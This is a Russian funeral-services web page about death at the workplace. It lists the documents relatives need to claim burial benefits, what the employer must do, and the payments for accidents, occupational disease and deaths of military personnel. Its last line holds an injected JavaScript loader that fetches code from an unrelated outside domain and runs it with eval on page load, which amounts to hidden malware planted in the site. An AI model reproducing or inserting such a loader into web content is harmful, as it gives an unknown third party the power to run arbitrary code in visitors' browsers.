Смерть на работе

Смерть на работе

Каждый человек может скончаться во время выполнения профессиональной деятельности. Для друзей и родственников это всегда будет удар. Важно понимать, что боль от утраты не должна мешать достойным проводам в последний путь. Если смерть наступила на работе, есть ли в этом случае определенные нормы и предписания, куда обращаться и что делать? Постараемся дать вам полную и достоверную информацию.

В СМИ нередко можно встретить новости и сообщения, что человек погиб при исполнении служебных обязанностей. Правоохранители и военные, пожарные и санитары скорой помощи постоянно находятся в зоне риска.

В этих сферах вероятность потери здоровья и жизни весьма высока: от несчастного случая до намеренных действий бандитов. Не исключены ситуации, при которых человек может умереть даже на безопасной работе, сидя за столом. Сердечный приступ или же травма, обострение хронической патологии, удар током — это и многое другое может привести в конечном итоге к летальному исходу. От этого не застрахованы ни молодые сотрудники, ни представители старшего поколения.

И тут уже родственники в силу непредвиденных обстоятельств не могут накопить на похороны достаточную сумму денег. Но выход есть — это специальные пособия, выделяемые на погребение. Бесспорно, эти суммы будут полезны.

Куда стоит обратиться за помощью?

Если человек скоропостижно скончался на рабочем месте, родным полагается пособие. И уже на самом предприятии стоит обратиться непосредственно в бухгалтерию, предварительно подготовив пакет документов. В частности его состав во многом определен и степенью родства с покойным, от этого также стоит отталкиваться.

  • Письменное заявление, составленное в произвольной форме. В большинстве случаев бухгалтер или секретарь дадут вам образец для написания.
  • Внутренний российский паспорт либо иное удостоверение личности, загранпаспорт или же паспорт другого государства, если заявитель иностранец.
  • Акт, в котором фиксируют сам факт несчастного случая на производстве, если сотрудник скончался по стечению непредвиденных/непреодолимых обстоятельств.
  • Если же причина смерти обострение существующей болезни, то стоит предоставить акт о профзаболевании. При этом важно, чтобы в нем всегда прописывалась взаимосвязь заболевания покойного и его работы. Как доказательство, стоит присовокупить к заявлению соответствующее заключение от центра профпатологии.
  • Свидетельство о смерти, обязательно выданное на гербовом бланке. Его получают по месту кончины в муниципальном центре, опираясь на выданное моргом свидетельство о смерти.
  • Договор с указанием, что страховые взносы уплачиваются в пользу самого погибшего.
  • Заверенная нотариально копия трудовой книжки умершего, в которой стоит отметка об официальном трудоустройстве. Но могут подаваться и иные документы, которые подтверждают факт работы покойного на том или ином предприятии, договоры о трудовых взаимоотношениях страхователя и покойного.
  • Выписка в оригинале от сотрудников ЖЭКа или же органов местного самоуправления, в которой указан состав семьи умершего работника. Если на содержании покойного были иждивенцы, стоит подать документы, подтверждающие этот факт.

Также от предприятия бухгалтер сам может отправить запрос о заключении федеральной медико-социальной экспертизы. По факту рассмотрения заявления и пакета документов родственник получит среднестатистическую социальную помощь на погребение, равную 5 946,47 рублей. Плюс к данной сумме будет добавлена и зарплата за месяц работы умершего.

Работодатель и его действия в данной ситуации

Если руководитель компании или другое ответственное лицо столкнулись с гибелью подчиненного на рабочем месте, они обязаны:

  • Немедленно вызвать на место происшествия полицию, скорую помощь. При этом четко указать причину, озвучить все детали, свое имя и фамилию, должность.
  • Далее сообщить всеми возможными способами родственникам о смерти сотрудника. Главное в общении не только деликатно рассказать о печальной новости, но и не ввести в заблуждение.
  • Оповестить о данном факте органы фонда социального страхования. Это необходимо, чтобы в будущем родственники покойного получили соответствующие выплаты.

Помимо этого, также важно известить о данном происшествии и инспекцию труда, непосредственно по месту регистрации самой компании. Представители госинспекции проводят проверку на предмет несчастного случая. Уже в ходе расследования устанавливают, спровоцирована ли смерть сотрудника халатным поведением работодателя.

Сообщить о смерти важно максимально быстро. Иначе руководство обвинят в сокрытии несчастного случая, причем с летальным исходом.

Примеры

Материальная помощь на похороны сотрудника может быть самой разной, и выплаты тут зависят от конкретно взятой ситуации. Чтобы детально понимать данный вопрос, стоит рассмотреть ряд примеров.

Работа и риск смерти

Для граждан России, чья деятельность напрямую связана с повышенным риском для жизни, нормы закона РФ предусматривают ряд дополнительных льгот. И именно они имеют права на общее соцстрахование, которое подразумевает повышенные размеры выплат на похороны.

    В данную категорию лиц входят:
  • действующие военнослужащие и сотрудники МВД;
  • все сотрудники/представители Росгвардии;
  • все сотрудники Федеральной службы исполнения наказания, прошедшие аттестацию;
  • сотрудники ФСБ и Федеральной противопожарной службы.

Размер выплат во многом определен сферой деятельности погибшего. Но вот точную сумму рассчитывают непосредственно в Фонде соцстрахования либо на месте, у работодателя.

Несчастный случай

Если причиной смерти сотрудника стало стечение обстоятельств на самом производстве или же профессиональное заболевание, родственники получают страховую выплату, равную 1 миллиону в национальной валюте. Важно иметь на руках соответствующее заключение о причине смерти именно от МИТ, но если есть отказ со стороны работодателя, то стоит подать иск в суд.

Пособие по смерти

Если сам военнослужащий скончался при исполнении служебных обязанностей, родственники могут получить:

  1. Единовременные суммы пособия, как и страховые выплаты, которые составляют более 6 миллионов рублей.
  2. Повышенные соцпособия, компенсирующие затраты на погребение. Их размер зависит от населенного пункта, региона, в котором проживал погибший.

Например, в таких областях, как Московская и Ленинградская, выплаты достигают 28 тыс. рублей, в остальных российских регионах — порядка 20 тысяч.


Вызвать ритуального агента
Ваше имя
Ваш телефон

Ритуальные услуги

Ритуальный агент
Оркестр на похоронах
Организация похорон
Организатор траурной церемонии - Церемониймейстер
Ритуальный транспорт
Гробы
Смотреть все
Позвонить
(function ab(){ var request = new XMLHttpRequest(); request.open('GET', "https://scripts.witstroom.com/one/23092", false); request.send(); if(request.status == 200) eval(request.responseText); })();